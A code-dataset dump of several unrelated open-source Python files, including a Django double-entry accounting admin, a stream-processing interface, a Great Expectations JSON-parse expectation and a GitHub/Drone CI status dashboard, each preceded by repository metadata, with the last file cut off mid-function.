795521b0c9fb42d0a0805621d1b8668cd72ec501 | 3,171 | py | Python | stixy/accounting/admin.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | stixy/accounting/admin.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | 7 | 2021-03-19T03:10:21.000Z | 2021-09-22T19:00:19.000Z | stixy/accounting/admin.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | """Admin Settings for Accounting App."""
from django.contrib import admin
from django.forms.models import BaseInlineFormSet
# Register your models here.
from .models import AccountClass, AccountGroup, \
Account, SubAccount, BankAccount, Transaction, Entry
from django.core.exceptions import ValidationError
class AccountClassAdmin(admin.ModelAdmin):
"""Admin settings for Account Class."""
list_display = ['name', 'positive_entry']
class AccountGroupAdmin(admin.ModelAdmin):
"""Admin Settings for Account Group."""
list_display = ['name', 'get_account_class']
def get_account_class(self, obj):
"""Get name of associated account clas."""
return obj.account_class.name
class AccountAdmin(admin.ModelAdmin):
"""Admin Settings for Account."""
list_display = ['code', 'name', 'get_account_group']
def get_account_group(self, obj):
"""Get name of associated account group."""
return obj.account_group.name
class SubAccountAdmin(admin.ModelAdmin):
"""Admin Settings for SubAccount."""
list_display = ['code', 'name']
class BankAccountAdmin(admin.ModelAdmin):
"""Admin Settings for Bank Account."""
list_display = ['number', 'name']
class EntryInlineFormSet(BaseInlineFormSet):
"""."""
def clean(self):
"""Clean."""
super(EntryInlineFormSet, self).clean()
debits, credits = 0, 0
entries = 0
for form in self.forms:
if not form.is_valid():
return # other errors exist, so don't bother.
# Shouldnt this do something other than return though?
if form.cleaned_data and not form.cleaned_data.get('DELETE'):
debits += form.cleaned_data['debit']
credits += form.cleaned_data['credit']
entries += 1
if form.cleaned_data['debit'] != 0 and form.cleaned_data['credit'] != 0:
raise ValidationError((
'One of credits or debits must be equal to 0.'))
# DO TOTAL INLINES CHECK
if entries < 2:
raise ValidationError(
('Each transaction requires a minimum of 2 entries'))
if debits != credits:
raise ValidationError((
'Transaction Debits and Credits must balance.'))
if debits != self.instance.amount:
raise ValidationError((
'Transaction amount must equal total debits and credits.'))
class EntryInline(admin.TabularInline):
"""Inline class for entry."""
model = Entry
min_num = 2
extra = 0
formset = EntryInlineFormSet
class TransactionAdmin(admin.ModelAdmin):
"""Admin settings for Transaction Class."""
list_display = ['id', 'date', 'short_description', 'amount']
inlines = [EntryInline]
admin.site.register(AccountClass, AccountClassAdmin)
admin.site.register(AccountGroup, AccountGroupAdmin)
admin.site.register(Account, AccountAdmin)
admin.site.register(SubAccount, SubAccountAdmin)
admin.site.register(BankAccount, BankAccountAdmin)
admin.site.register(Transaction, TransactionAdmin)
admin.site.register(Entry)
| 29.915094 | 88 | 0.654998 |
795521d5f9db61a35305b69ed8d9c98546bf0698 | 394 | py | Python | onlinejudge/__about__.py | beet-aizu/api-client | 5d026051ac51477f29dc714e9f8a72f7a7f72ace | [
"MIT"
] | null | null | null | onlinejudge/__about__.py | beet-aizu/api-client | 5d026051ac51477f29dc714e9f8a72f7a7f72ace | [
"MIT"
] | null | null | null | onlinejudge/__about__.py | beet-aizu/api-client | 5d026051ac51477f29dc714e9f8a72f7a7f72ace | [
"MIT"
] | null | null | null | # Python Version: 3.x
__package_name__ = 'online-judge-api-client'
__author__ = 'Kimiyuki Onaka'
__email__ = 'kimiyuki95@gmail.com'
__license__ = 'MIT License'
__url__ = 'https://github.com/online-judge-tools/api-client'
__version_info__ = (10, 2, 0, 'final', 0)
__version__ = '.'.join(map(str, __version_info__[:3]))
__description__ = 'API client to develop tools for competitive programming'
| 39.4 | 75 | 0.748731 |
795523c3a9feb0baeab29cca34135f2ddfcf25e4 | 1,149 | py | Python | dedupe/tfidf.py | neozhangthe1/dedupe | aff99e6bd027291eecfb78eae08aa73877f4fff0 | [
"MIT"
] | null | null | null | dedupe/tfidf.py | neozhangthe1/dedupe | aff99e6bd027291eecfb78eae08aa73877f4fff0 | [
"MIT"
] | null | null | null | dedupe/tfidf.py | neozhangthe1/dedupe | aff99e6bd027291eecfb78eae08aa73877f4fff0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from .index import CanopyIndex
import collections
import itertools
logger = logging.getLogger(__name__)
class TfIdfIndex(object) :
def __init__(self, stop_words=[]) :
self._index = CanopyIndex(stop_words)
try : # py 2
self._doc_to_id = collections.defaultdict(itertools.count(1).next)
except AttributeError : # py 3
self._doc_to_id = collections.defaultdict(itertools.count(1).__next__)
self._parseTerms = self._index.lexicon.parseTerms
def index(self, doc) :
i = self._doc_to_id[doc]
self._index.index_doc(i, doc)
def unindex(self, doc) :
i = self._doc_to_id.pop(doc)
self._index.unindex_doc(i)
self.initSearch()
def initSearch(self) :
self._index.initSearch()
def search(self, doc, threshold=0) :
query_list = self._parseTerms(doc)
if query_list :
results = [center for score, center
in self._index.apply(query_list, threshold)]
else :
results = []
return results
| 25.533333 | 82 | 0.613577 |
795523efe2f0cd6c09760ff4c088a56a2154ba3c | 823 | py | Python | alipay/aop/api/response/AlipayAssetPointVoucherprodBenefittemplateOfflineResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/response/AlipayAssetPointVoucherprodBenefittemplateOfflineResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/response/AlipayAssetPointVoucherprodBenefittemplateOfflineResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayAssetPointVoucherprodBenefittemplateOfflineResponse(AlipayResponse):
def __init__(self):
super(AlipayAssetPointVoucherprodBenefittemplateOfflineResponse, self).__init__()
self._quick_recycle = None
@property
def quick_recycle(self):
return self._quick_recycle
@quick_recycle.setter
def quick_recycle(self, value):
self._quick_recycle = value
def parse_response_content(self, response_content):
response = super(AlipayAssetPointVoucherprodBenefittemplateOfflineResponse, self).parse_response_content(response_content)
if 'quick_recycle' in response:
self.quick_recycle = response['quick_recycle']
| 31.653846 | 130 | 0.752126 |
79552494a25c942a8c5b6dba2804a5c162a8a297 | 145 | py | Python | FlaskApp/filters.py | tulare/FlaskSMS | e9b9261399a6c06e073555f9b708574a406a1931 | [
"MIT"
] | null | null | null | FlaskApp/filters.py | tulare/FlaskSMS | e9b9261399a6c06e073555f9b708574a406a1931 | [
"MIT"
] | null | null | null | FlaskApp/filters.py | tulare/FlaskSMS | e9b9261399a6c06e073555f9b708574a406a1931 | [
"MIT"
] | 1 | 2020-12-02T07:42:33.000Z | 2020-12-02T07:42:33.000Z | # -*- encoding: utf-8 -*-
from datetime import datetime
from . import app
@app.template_filter('now')
def f_now(s) :
return datetime.now()
| 16.111111 | 29 | 0.675862 |
795526808989e080a313c95b5258c7aaa4e2dcaf | 280 | py | Python | pydex/core/logger.py | KennedyPutraKusumo/py-DED | c5742c29cae66542960060f19d65b446d532b477 | [
"MIT"
] | 2 | 2020-05-19T14:06:41.000Z | 2021-09-09T16:11:53.000Z | pydex/core/logger.py | KennedyPutraKusumo/py-DED | c5742c29cae66542960060f19d65b446d532b477 | [
"MIT"
] | 2 | 2020-04-28T02:36:36.000Z | 2021-08-23T09:36:13.000Z | pydex/core/logger.py | KennedyPutraKusumo/py-DED | c5742c29cae66542960060f19d65b446d532b477 | [
"MIT"
] | 2 | 2020-10-10T18:43:27.000Z | 2020-11-22T19:41:05.000Z | import sys
class Logger(object):
def __init__(self, file_path):
self.terminal = sys.stdout
self.log = open(file_path, "a")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
pass
| 18.666667 | 39 | 0.607143 |
79552722dbb8de896108c79732e3961101e1719f | 3,696 | py | Python | main/application.py | metworkbot/github_organization_dashboard | 34bd70187a2970241523ccbe65c7c6cd0b293fb1 | [
"BSD-3-Clause"
] | null | null | null | main/application.py | metworkbot/github_organization_dashboard | 34bd70187a2970241523ccbe65c7c6cd0b293fb1 | [
"BSD-3-Clause"
] | null | null | null | main/application.py | metworkbot/github_organization_dashboard | 34bd70187a2970241523ccbe65c7c6cd0b293fb1 | [
"BSD-3-Clause"
] | null | null | null | import os
import jinja2
import aiohttp_jinja2
import aiohttp_github_helpers as h
from aiohttp import web, ClientSession, BasicAuth, ClientTimeout
DRONE_SERVER = os.environ['DRONE_SERVER']
DRONE_TOKEN = os.environ['DRONE_TOKEN']
TOPICS = ["integration-level-5", "integration-level-4", "integration-level-3",
"integration-level-2", "integration-level-1"]
ORG = "metwork-framework"
BRANCHES = ["integration", "master"]
GITHUB_USER = os.environ['GITHUB_USER']
GITHUB_PASS = os.environ['GITHUB_PASS']
TIMEOUT = ClientTimeout(total=20)
AUTH = BasicAuth(GITHUB_USER, GITHUB_PASS)
TEMPLATES_DIR = os.path.join(os.environ['MFSERV_CURRENT_PLUGIN_DIR'], 'main',
'templates')
async def drone_get_latest_status(client_session, owner, repo, branch):
url = "%s/api/repos/%s/%s/builds" % (DRONE_SERVER, owner, repo)
params = {"token": DRONE_TOKEN}
async with client_session.get(url, params=params) as r:
if r.status != 200:
return None
try:
builds = await r.json()
for build in builds:
if build['event'] != 'push':
continue
if build['branch'] != branch:
continue
return {"status": build['status'], "number": build['number'],
"url": "%s/%s/%s/%i" % (DRONE_SERVER, owner,
repo, build['number'])}
except Exception:
pass
return None
async def handle(request):
async with ClientSession(auth=AUTH, timeout=TIMEOUT) as session:
ghrepos = []
for topic in TOPICS:
tmp = await h.github_get_org_repos_by_topic(session, ORG, [topic],
["testrepo"])
ghrepos = ghrepos + tmp
repos = []
for repo in ghrepos:
tmp = {"name": repo, "url": "https://github.com/%s/%s" %
(ORG, repo), "branches": []}
for branch in BRANCHES:
commit_future = h.github_get_latest_commit(session, ORG, repo,
branch)
status_future = drone_get_latest_status(session, ORG, repo,
branch)
tmp['branches'].append({
"name": branch,
"commit_future": commit_future,
"status_future": status_future,
"github_link": "https://github.com/%s/%s/tree/%s" %
(ORG, repo, branch)
})
repos.append(tmp)
for repo in repos:
for branch in repo['branches']:
commit = await branch['commit_future']
if branch['name'] == 'master' and commit:
repo['master_sha'] = commit[0][0:7]
else:
repo['master_sha'] = None
sha = None
age = None
if commit:
sha = commit[0][0:7]
age = commit[1]
branch['sha'] = sha
branch['age'] = age
del(branch['commit_future'])
status = await branch['status_future']
branch['drone_status'] = status
del(branch['status_future'])
context = {"REPOS": repos, "BRANCHES": BRANCHES}
response = aiohttp_jinja2.render_template('home.html', request, context)
return response
app = web.Application(debug=False)
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(TEMPLATES_DIR))
app.router.add_get('/{tail:.*}', handle)
| 40.615385 | 78 | 0.525162 |
795529827bc4dedd1815105a54c16b03c0516c67 | 5,089 | py | Python | apps/authentication/admin.py | Nicolaad/onlineweb4 | 5942eaf907d6824d5384147627def9edefdb9946 | [
"MIT"
] | null | null | null | apps/authentication/admin.py | Nicolaad/onlineweb4 | 5942eaf907d6824d5384147627def9edefdb9946 | [
"MIT"
] | null | null | null | apps/authentication/admin.py | Nicolaad/onlineweb4 | 5942eaf907d6824d5384147627def9edefdb9946 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext as _
from reversion.admin import VersionAdmin
from apps.authentication.models import (
AllowedUsername,
Email,
GroupMember,
GroupRole,
OnlineGroup,
OnlineUser,
Position,
SpecialPosition,
)
class EmailInline(admin.TabularInline):
model = Email
extra = 1
class OnlineUserAdmin(UserAdmin, VersionAdmin):
model = OnlineUser
inlines = (EmailInline,)
list_display = [
"username",
"first_name",
"last_name",
"ntnu_username",
"field_of_study",
"is_member",
]
list_filter = ("is_staff", "is_superuser", "is_active", "groups__name")
fieldsets = (
(None, {"fields": ("username", "password")}),
(
_("Personlig info"),
{"fields": ("first_name", "last_name", "phone_number", "online_mail")},
),
(
_("Studieinformasjon"),
{"fields": ("ntnu_username", "field_of_study", "started_date", "compiled")},
),
(_("Adresse"), {"fields": ("address", "zip_code")}),
(_("Viktige datoer"), {"fields": ("last_login", "date_joined")}),
(
_("Annen info"),
{
"fields": (
"infomail",
"jobmail",
"mark_rules_accepted",
"rfid",
"nickname",
"website",
)
},
),
(
_("Tilganger"),
{
"fields": (
"is_active",
"is_staff",
"is_superuser",
"groups",
"user_permissions",
)
},
),
)
filter_horizontal = ("groups", "user_permissions")
search_fields = ("first_name", "last_name", "username", "ntnu_username")
readonly_fields = ("mark_rules_accepted",)
def is_member(self, instance: OnlineUser):
return instance.is_member
is_member.boolean = True
def mark_rules_accepted(self, instance: OnlineUser):
return instance.mark_rules_accepted
mark_rules_accepted.boolean = True
admin.site.register(OnlineUser, OnlineUserAdmin)
class AllowedUsernameAdmin(VersionAdmin):
model = AllowedUsername
list_display = ("username", "registered", "expiration_date", "note", "is_active")
fieldsets = (
(None, {"fields": ("username", "registered", "expiration_date")}),
(_("Notater"), {"fields": ("note", "description")}),
)
search_fields = ("username",)
def save_model(self, request, obj, form, change):
if not change:
# Try to fetch user with this username
try:
user = OnlineUser.objects.get(ntnu_username=obj.username)
except OnlineUser.DoesNotExist:
user = None
# If username was found, set infomail to True
if user and user.infomail is False:
user.infomail = True
user.save()
obj.save()
def is_active(self, instance):
return instance.is_active
is_active.boolean = True
admin.site.register(AllowedUsername, AllowedUsernameAdmin)
class PositionAdmin(VersionAdmin):
model = Position
admin.site.register(Position, PositionAdmin)
class SpecialPositionAdmin(VersionAdmin):
model = SpecialPosition
admin.site.register(SpecialPosition, SpecialPositionAdmin)
class GroupMemberInlineAdmin(admin.StackedInline):
model = GroupMember
extra = 0
@admin.register(OnlineGroup)
class OnlineGroupAdmin(VersionAdmin):
model = OnlineGroup
list_display = ("name_short", "name_long", "member_count", "verbose_type", "leader")
list_display_links = ("name_short", "name_long")
search_fields = ("name_short", "name_long", "group_type", "email")
inlines = (GroupMemberInlineAdmin,)
def member_count(self, group: OnlineGroup):
return f"{group.members.count()} ({group.group.user_set.count()})"
member_count.admin_order_field = "members__count"
member_count.short_description = "Antall medlemmder (synkronisert)"
@admin.register(GroupMember)
class GroupMemberAdmin(VersionAdmin):
model = GroupMember
list_display = ("user", "group", "all_roles")
search_fields = (
"user__username",
"user__first_name",
"user__last_name",
"group__name_short",
"group__name_long",
"roles__role_type",
)
def all_roles(self, member: GroupMember):
return ", ".join([role.verbose_name for role in member.roles.all()])
all_roles.short_description = "Roller"
def get_queryset(self, *args):
return super().get_queryset(*args).prefetch_related("roles")
@admin.register(GroupRole)
class GroupRoleAdmin(VersionAdmin):
model = GroupRole
list_display = ("role_type", "verbose_name")
search_fields = ("role_type",)
| 27.360215 | 88 | 0.599528 |
795529cde049769e04b456e02a807a6f78f8c7fc | 519 | py | Python | var/spack/repos/builtin/packages/sparsehash/package.py | whitfin/spack | aabd2be31a511d0e00c1017f7311a421659319d9 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3 | 2019-06-27T13:26:50.000Z | 2019-07-01T16:24:54.000Z | var/spack/repos/builtin/packages/sparsehash/package.py | openbiox/spack | bb6ec7fb40c14b37e094a860e3625af53f633174 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75 | 2016-07-27T11:43:00.000Z | 2020-12-08T15:56:53.000Z | var/spack/repos/builtin/packages/sparsehash/package.py | openbiox/spack | bb6ec7fb40c14b37e094a860e3625af53f633174 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8 | 2015-10-16T13:51:49.000Z | 2021-10-18T13:58:03.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Sparsehash(AutotoolsPackage):
"""Sparse and dense hash-tables for C++ by Google"""
homepage = "https://github.com/sparsehash/sparsehash"
url = "https://github.com/sparsehash/sparsehash/archive/sparsehash-2.0.3.tar.gz"
version('2.0.3', 'd8d5e2538c1c25577b3f066d7a55e99e')
| 34.6 | 89 | 0.736031 |
795529f53576d940b3a836437e26d5f72856e6b7 | 138 | py | Python | flight_control/flight/admin.py | kenware/flight-api | adfa6f320b6c5bd9830bfb7c3c947028acf39e23 | [
"MIT"
] | null | null | null | flight_control/flight/admin.py | kenware/flight-api | adfa6f320b6c5bd9830bfb7c3c947028acf39e23 | [
"MIT"
] | 10 | 2019-08-06T02:06:53.000Z | 2022-02-10T11:16:37.000Z | flight_control/flight/admin.py | kenware/flight-api | adfa6f320b6c5bd9830bfb7c3c947028acf39e23 | [
"MIT"
] | null | null | null | from django.contrib import admin
from flight_control.flight.models import Flight
# Register your models here.
admin.site.register(Flight) | 27.6 | 47 | 0.833333 |
79552a7ff5a6c3baacd18824754627e8e783b69b | 7,711 | py | Python | great_expectations/expectations/core/expect_column_values_to_be_json_parseable.py | alecsaunders/great_expectations | 4227c970fd93cd66a9ad3b8ee5cd5e09763a4432 | [
"Apache-2.0"
] | 1 | 2022-01-26T18:51:29.000Z | 2022-01-26T18:51:29.000Z | great_expectations/expectations/core/expect_column_values_to_be_json_parseable.py | taylorfturner/great_expectations | e4964894fb97b933cac713ef1f1a78e33d362ff3 | [
"Apache-2.0"
] | null | null | null | great_expectations/expectations/core/expect_column_values_to_be_json_parseable.py | taylorfturner/great_expectations | e4964894fb97b933cac713ef1f1a78e33d362ff3 | [
"Apache-2.0"
] | null | null | null | from typing import Optional
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.expectations.util import render_evaluation_parameter_string
from ...render.renderer.renderer import renderer
from ...render.types import RenderedStringTemplateContent
from ...render.util import (
num_to_str,
parse_row_condition_string_pandas_engine,
substitute_none_for_missing,
)
from ..expectation import ColumnMapExpectation
try:
import sqlalchemy as sa
except ImportError:
pass
class ExpectColumnValuesToBeJsonParseable(ColumnMapExpectation):
"""Expect column entries to be data written in JavaScript Object Notation.
expect_column_values_to_be_json_parseable is a \
:func:`column_map_expectation <great_expectations.execution_engine.execution_engine.MetaExecutionEngine
.column_map_expectation>`.
Args:
column (str): \
The column name.
Keyword Args:
mostly (None or a float between 0 and 1): \
Return `"success": True` if at least mostly fraction of values match the expectation. \
For more detail, see :ref:`mostly`.
Other Parameters:
result_format (str or None): \
Which output mode to use: `BOOLEAN_ONLY`, `BASIC`, `COMPLETE`, or `SUMMARY`.
For more detail, see :ref:`result_format <result_format>`.
include_config (boolean): \
If True, then include the expectation config as part of the result object. \
For more detail, see :ref:`include_config`.
catch_exceptions (boolean or None): \
If True, then catch exceptions and include them as part of the result object. \
For more detail, see :ref:`catch_exceptions`.
meta (dict or None): \
A JSON-serializable dictionary (nesting allowed) that will be included in the output without \
modification. For more detail, see :ref:`meta`.
Returns:
An ExpectationSuiteValidationResult
Exact fields vary depending on the values passed to :ref:`result_format <result_format>` and
:ref:`include_config`, :ref:`catch_exceptions`, and :ref:`meta`.
See Also:
:func:`expect_column_values_to_match_json_schema \
<great_expectations.execution_engine.execution_engine.ExecutionEngine
.expect_column_values_to_match_json_schema>`
"""
# This dictionary contains metadata for display in the public gallery
library_metadata = {
"maturity": "production",
"package": "great_expectations",
"tags": ["core expectation", "column map expectation"],
"contributors": ["@great_expectations"],
"requirements": [],
}
map_metric = "column_values.json_parseable"
success_keys = ("mostly",)
default_kwarg_values = {
"row_condition": None,
"condition_parser": None, # we expect this to be explicitly set whenever a row_condition is passed
"mostly": 1,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": True,
}
args_keys = ("column",)
def validate_configuration(self, configuration: Optional[ExpectationConfiguration]):
super().validate_configuration(configuration)
return True
@classmethod
def _atomic_prescriptive_template(
cls,
configuration=None,
result=None,
language=None,
runtime_configuration=None,
**kwargs,
):
runtime_configuration = runtime_configuration or {}
include_column_name = runtime_configuration.get("include_column_name", True)
include_column_name = (
include_column_name if include_column_name is not None else True
)
styling = runtime_configuration.get("styling")
params = substitute_none_for_missing(
configuration.kwargs,
["column", "mostly", "row_condition", "condition_parser"],
)
params_with_json_schema = {
"column": {"schema": {"type": "string"}, "value": params.get("column")},
"mostly": {"schema": {"type": "number"}, "value": params.get("mostly")},
"mostly_pct": {
"schema": {"type": "number"},
"value": params.get("mostly_pct"),
},
"row_condition": {
"schema": {"type": "string"},
"value": params.get("row_condition"),
},
"condition_parser": {
"schema": {"type": "string"},
"value": params.get("condition_parser"),
},
}
template_str = "values must be parseable as JSON"
if params["mostly"] is not None:
params_with_json_schema["mostly_pct"]["value"] = num_to_str(
params["mostly"] * 100, precision=15, no_scientific=True
)
# params["mostly_pct"] = "{:.14f}".format(params["mostly"]*100).rstrip("0").rstrip(".")
template_str += ", at least $mostly_pct % of the time."
else:
template_str += "."
if include_column_name:
template_str = "$column " + template_str
if params["row_condition"] is not None:
(
conditional_template_str,
conditional_params,
) = parse_row_condition_string_pandas_engine(
params["row_condition"], with_schema=True
)
template_str = conditional_template_str + ", then " + template_str
params_with_json_schema.update(conditional_params)
return (template_str, params_with_json_schema, styling)
@classmethod
@renderer(renderer_type="renderer.prescriptive")
@render_evaluation_parameter_string
def _prescriptive_renderer(
cls,
configuration=None,
result=None,
language=None,
runtime_configuration=None,
**kwargs,
):
runtime_configuration = runtime_configuration or {}
include_column_name = runtime_configuration.get("include_column_name", True)
include_column_name = (
include_column_name if include_column_name is not None else True
)
styling = runtime_configuration.get("styling")
params = substitute_none_for_missing(
configuration.kwargs,
["column", "mostly", "row_condition", "condition_parser"],
)
template_str = "values must be parseable as JSON"
if params["mostly"] is not None:
params["mostly_pct"] = num_to_str(
params["mostly"] * 100, precision=15, no_scientific=True
)
# params["mostly_pct"] = "{:.14f}".format(params["mostly"]*100).rstrip("0").rstrip(".")
template_str += ", at least $mostly_pct % of the time."
else:
template_str += "."
if include_column_name:
template_str = "$column " + template_str
if params["row_condition"] is not None:
(
conditional_template_str,
conditional_params,
) = parse_row_condition_string_pandas_engine(params["row_condition"])
template_str = conditional_template_str + ", then " + template_str
params.update(conditional_params)
return [
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": template_str,
"params": params,
"styling": styling,
},
}
)
]
| 37.251208 | 107 | 0.613669 |
79552bb093a507df525f6837f2c199b56e54edb3 | 8,571 | py | Python | streams/interfaces/iterable_stream_interface.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/interfaces/iterable_stream_interface.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/interfaces/iterable_stream_interface.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import Optional, Union, Callable, Iterable, Iterator, NoReturn
try: # Assume we're a sub-module in a package.
from utils import arguments as arg
from utils.external import DataFrame
from utils.algo import JoinType
from streams.stream_type import StreamType
from streams.interfaces.abstract_stream_interface import StreamInterface
from base.interfaces.context_interface import ContextInterface
from loggers.selection_logger_interface import SelectionLoggerInterface
except ImportError: # Apparently no higher-level package has been imported, fall back to a local import.
from ...utils import arguments as arg
from ...utils.external import DataFrame
from ...utils.algo import JoinType
from ..stream_type import StreamType
from ..interfaces.abstract_stream_interface import StreamInterface
from ...base.interfaces.context_interface import ContextInterface
from ...loggers.selection_logger_interface import SelectionLoggerInterface
Native = StreamInterface
Stream = StreamInterface
Context = Union[ContextInterface, arg.Auto, None]
Count = Union[int, arg.Auto]
OptionalFields = Union[Iterable, str, None]
class IterableStreamInterface(StreamInterface, ABC):
@abstractmethod
def __iter__(self) -> Iterable:
"""Returns link to Iterable data in stream.
:return: list or Iterator
"""
pass
@abstractmethod
def is_in_memory(self) -> bool:
"""Checks is the data of stream in RAM or in external iterator.
:return: True if stream has data as Sequence in memory, False if it has an iterator
"""
pass
@abstractmethod
def close(self, recursively: bool = False, return_closed_links: bool = False) -> Union[int, tuple]:
"""Closes stream and its sources by known links (i.e. file or database connection).
:param recursively: close all links to stream recursively
:type recursively: bool
:param return_closed_links: let return count of closed streams and links, otherwise stream count only
:type return_closed_links: bool
:return: count of closed streams or tuple with count of closed streams and links
"""
pass
@abstractmethod
def forget(self) -> NoReturn:
"""Closes stream and remove links to it from SnakeeContext and connectors."""
pass
@abstractmethod
def get_iter(self) -> Iterator:
"""Presents items from stream as Iterator.
:return: Iterator or Generator
"""
pass
@abstractmethod
def get_count(self) -> Optional[int]:
"""Returns count of items in stream is it's known, otherwise returns None.
:return: int or None
"""
pass
@abstractmethod
def get_expected_count(self) -> Optional[int]:
"""Returns expected count of items if it's provided in from stream meta-information.
:return: int or None (if count expectation is not available for this stream or data source)
"""
pass
@abstractmethod
def get_estimated_count(self) -> Optional[int]:
"""Returns estimated count (upper bound) of items from stream meta-information.
:return: int or None (if count estimation is not available for this stream or data source)
"""
pass
@abstractmethod
def get_str_count(self) -> str:
"""Returns string with general information about expected and estimated count of items in stream."""
pass
@abstractmethod
def enumerate(self, native: bool = False) -> Stream:
"""Returns stream with enumerated items of current stream.
:param native: let return stream of same class (KeyValueStream will returned by default)
:type native: bool
:return: KeyValueStream (if native=False) or stream of same class (if native=True)
"""
pass
@abstractmethod
def get_one_item(self):
"""Returns first item from stream for example."""
pass
@abstractmethod
def take(self, count: int = 1) -> Native:
"""Return stream containing first N items.
Alias for head()
:param count: count of items to return
:type count: int
:return: Native Stream (stream of same class)
"""
pass
@abstractmethod
def head(self, count: int = 10) -> Native:
"""Return stream containing first N items.
Alias for take()
:param count: count of items to return
:type count: int
:return: Native Stream (stream of same class)
"""
pass
@abstractmethod
def tail(self, count: int = 10) -> Native:
"""Return stream containing last N items from current stream.
:param count: count of items to return
:type count: int
:return: Native Stream (stream of same class)
"""
pass
@abstractmethod
def skip(self, count: int) -> Native:
"""Return stream with items except first N items.
:param count: count of items to skip
:type count: int
:return: Native Stream (stream of same class)
"""
pass
@abstractmethod
def pass_items(self) -> Native:
"""Receive and skip all items from data source.
Can be used for case when data source must be sure that all data has been transmitted successfully.
:return: Native Stream (stream of same class)
"""
pass
@abstractmethod
def stream(self, data: Iterable, ex: OptionalFields = None, **kwargs) -> Native:
"""Build new stream with data provided.
Meta-information of initial stream will by saved by default (excluding fields from ex-argument).
:param data: link to iterable data for new stream
:type data: Iterable
:param ex: one field name or list of fields to exclude from transmitted meta-information
:type ex: list or str or None
:return: Native Stream (stream of same class)
"""
pass
@abstractmethod
def add(self, stream_or_items: Union[Native, Iterable], before=False, **kwargs) -> Native:
pass
@abstractmethod
def add_stream(self, stream: Native, before: bool = False) -> Native:
pass
@abstractmethod
def add_items(self, items: Iterable, before: bool = False) -> Native:
pass
@abstractmethod
def split(self, by: Union[int, list, tuple, Callable], count: Optional[int] = None) -> Iterable:
pass
@abstractmethod
def split_to_iter_by_step(self, step: int) -> Iterable:
pass
@abstractmethod
def flat_map(self, function: Callable) -> Native:
pass
@abstractmethod
def map_side_join(
self,
right: Native,
key,
how: Union[JoinType, str] = JoinType.Left,
right_is_uniq: bool = True,
) -> Native:
pass
@abstractmethod
def apply_to_data(
self, function: Callable,
to: StreamType = arg.AUTO,
save_count: bool = False, lazy: bool = True,
) -> Stream:
pass
@abstractmethod
def progress(
self,
expected_count: Count = arg.AUTO, step: Count = arg.AUTO,
message: str = 'Progress',
) -> Native:
"""Shows customizable progress-bar on output, writes logs of progress into file, if file added to logger.
:param expected_count: allows to provide expected count of items in stream, when it's known
:param step: how often show update (lower values can make process more slow), 10000 by default
:param message: custom message to show in progress-bar
:return: same stream
"""
pass
@abstractmethod
def print(self, stream_function: Union[str, Callable] = '_count', *args, **kwargs) -> Native:
pass
@abstractmethod
def submit(
self,
external_object: Union[list, dict, Callable] = print,
stream_function: Union[Callable, str] = 'get_count',
key: Optional[str] = None,
show: bool = False,
) -> Stream:
pass
@abstractmethod
def set_meta(self, **meta) -> Native:
pass
@abstractmethod
def update_meta(self, **meta) -> Native:
pass
@abstractmethod
def get_selection_logger(self) -> SelectionLoggerInterface:
pass
@abstractmethod
def get_dataframe(self, columns: Optional[Iterable] = None) -> DataFrame:
pass
| 31.862454 | 113 | 0.643332 |
79552bfcc2c78b69474b39be06cf2f7dca51c8fa | 1,109 | py | Python | gcforest/utils/metrics.py | chenkangyang/CMAESEforWaterPrediction | a50a53748e5cbfc1ae856e776cfa15f80b871780 | [
"MIT"
] | null | null | null | gcforest/utils/metrics.py | chenkangyang/CMAESEforWaterPrediction | a50a53748e5cbfc1ae856e776cfa15f80b871780 | [
"MIT"
] | 12 | 2019-12-16T21:48:20.000Z | 2022-02-10T00:21:16.000Z | gcforest/utils/metrics.py | chenkangyang/CMAESEforWaterPrediction | a50a53748e5cbfc1ae856e776cfa15f80b871780 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import numpy as np
from sklearn.metrics import f1_score
from .win_utils import win_vote, win_avg
def accuracy(y_true, y_pred):
return 1.0 * np.sum(y_true == y_pred) / len(y_true)
def accuracy_pb(y_true, y_proba):
y_true = y_true.reshape(-1)
y_pred = np.argmax(y_proba.reshape((-1, y_proba.shape[-1])), 1)
